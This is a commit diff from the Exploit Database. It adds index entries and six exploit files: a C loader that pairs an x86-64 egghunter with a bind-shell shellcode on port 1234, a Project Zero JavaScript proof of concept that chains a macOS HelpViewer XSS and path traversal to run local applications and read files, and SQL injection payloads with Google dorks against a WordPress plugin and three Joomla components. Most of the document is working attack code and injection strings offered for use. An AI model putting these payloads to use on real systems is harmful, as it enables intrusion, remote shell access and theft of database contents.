DB: 2017-02-24

6 new exploits

macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read

Linux/x86-64 - Egghunter Shellcode (38 bytes)
WordPress Plugin Mail Masta 1.0 - SQL Injection
Joomla! Component Store for K2 3.8.2 - SQL Injection
Joomla! Component UserExtranet 1.3.1 - SQL Injection
Joomla! Component MultiTier 3.1 - SQL Injection
This commit is contained in:
Offensive Security 2017-02-24 05:01:18 +00:00
parent c7c1c7d92e
commit 3710b90d25
7 changed files with 388 additions and 0 deletions

View file

@ -15296,6 +15296,7 @@ id,file,description,date,author,platform,type,port
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15912,6 +15913,7 @@ id,file,description,date,author,platform,type,port
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37354,3 +37356,7 @@ id,file,description,date,author,platform,type,port
41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
41438,platforms/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",php,webapps,0
41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

174
platforms/linux/shellcode/41439.c Executable file
View file

@ -0,0 +1,174 @@
/**
Copyright © 2017 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
; 38 byte Egg Hunter using sys_access() for x86-64 Linux
;
bits 64
xor edi, edi ; rdi = 0
mul edi ; rax = 0, rdx = 0
xchg eax, esi ; rsi = F_OK
mov dh, 10h ; rdx = 4096
nxt_page:
add rdi, rdx ; advance 4096 bytes
nxt_addr:
push rdi ; save page address
add rdi, 8 ; try read 8 bytes ahead
push 21
pop rax ; rax = sys_access
syscall
pop rdi ; restore rdi
cmp al, 0xF2 ; -EFAULT means bad address
je nxt_page ; keep going until good read
; put your own signature here
mov eax, 0xDEADC0DE
scasd
jne nxt_addr
scasd
jne nxt_addr
jmp rdi ; jump into shellcode
*/
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#define EGG64_SIZE 38
char EGG64[] = {
/* 0000 */ "\x31\xff" /* xor edi, edi */
/* 0002 */ "\xf7\xe7" /* mul edi */
/* 0004 */ "\x96" /* xchg esi, eax */
/* 0005 */ "\xb6\x10" /* mov dh, 0x10 */
/* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */
/* 000A */ "\x57" /* push rdi */
/* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */
/* 000F */ "\x6a\x15" /* push 0x15 */
/* 0011 */ "\x58" /* pop rax */
/* 0012 */ "\x0f\x05" /* syscall */
/* 0014 */ "\x5f" /* pop rdi */
/* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */
/* 0017 */ "\x74\xee" /* jz 0x7 */
/* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */
/* 001E */ "\xaf" /* scasd */
/* 001F */ "\x75\xe9" /* jnz 0xa */
/* 0021 */ "\xaf" /* scasd */
/* 0022 */ "\x75\xe6" /* jnz 0xa */
/* 0024 */ "\xff\xe7" /* jmp rdi */
};
// sig is 0xDEADC0DE
#define EGG_SIG "\xDE\xC0\xAD\xDE"
// 71 byte bind shell for x86-64 Linux.
// listens on 0.0.0.0:1234
//
// port offset is 0x010
//
char BS[] = {
EGG_SIG
EGG_SIG
/* 0000 */ "\x6a\x29" /* push 0x29 */
/* 0002 */ "\x58" /* pop rax */
/* 0003 */ "\x6a\x01" /* push 0x1 */
/* 0005 */ "\x5e" /* pop rsi */
/* 0006 */ "\x6a\x02" /* push 0x2 */
/* 0008 */ "\x5f" /* pop rdi */
/* 0009 */ "\x99" /* cdq */
/* 000A */ "\x0f\x05" /* syscall */
/* 000C */ "\x97" /* xchg edi, eax */
/* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */
/* 0012 */ "\xfe\xc7" /* inc bh */
/* 0014 */ "\x53" /* push rbx */
/* 0015 */ "\x54" /* push rsp */
/* 0016 */ "\x5e" /* pop rsi */
/* 0017 */ "\xb2\x10" /* mov dl, 0x10 */
/* 0019 */ "\xb0\x31" /* mov al, 0x31 */
/* 001B */ "\x0f\x05" /* syscall */
/* 001D */ "\x31\xf6" /* xor esi, esi */
/* 001F */ "\xb0\x32" /* mov al, 0x32 */
/* 0021 */ "\x0f\x05" /* syscall */
/* 0023 */ "\xb0\x2b" /* mov al, 0x2b */
/* 0025 */ "\x0f\x05" /* syscall */
/* 0027 */ "\x97" /* xchg edi, eax */
/* 0028 */ "\x96" /* xchg esi, eax */
/* 0029 */ "\xb0\x21" /* mov al, 0x21 */
/* 002B */ "\x0f\x05" /* syscall */
/* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */
/* 0030 */ "\x79\xf7" /* jns 0x29 */
/* 0032 */ "\x31\xf6" /* xor esi, esi */
/* 0034 */ "\x50" /* push rax */
/* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */
/* 003F */ "\x51" /* push rcx */
/* 0040 */ "\x54" /* push rsp */
/* 0041 */ "\x5f" /* pop rdi */
/* 0042 */ "\x99" /* cdq */
/* 0043 */ "\xb0\x3b" /* mov al, 0x3b */
/* 0045 */ "\x0f\x05" /* syscall */
};
void xcode(char *s, int len)
{
uint8_t *p;
p=(uint8_t*)mmap (0, len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
memcpy(p, s, len);
// execute
((void(*)())p)();
munmap ((void*)p, len);
}
int main(int argc, char *argv[])
{
uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS),
PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if (sc != NULL) {
memcpy (sc, BS, sizeof(BS));
xcode (EGG64, EGG64_SIZE);
munmap((void*)sc, sizeof(BS));
}
return 0;
}

View file

@ -0,0 +1,69 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
function main() {
function second() {
var f = document.createElement("iframe");
f.onload = () => {
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
};
f.src = "help:openbook=com.apple.safari.help";
document.documentElement.appendChild(f);
}
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
main();
</script>

80
platforms/php/webapps/41438.txt Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://github.com/hamkovic/
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
Mail-Masta SQL Injection
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
GET Parameter: list_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
csvexport.php:
$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
GET Parameter: filter_list
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
view-list.php:
global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
POST Parameter: camp_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
count_of_send.php:
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
POST Parameter: list_id
campaign_save.php:
$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
...snip...
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1

17
platforms/php/webapps/41440.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #

19
platforms/php/webapps/41441.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #

23
platforms/php/webapps/41442.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #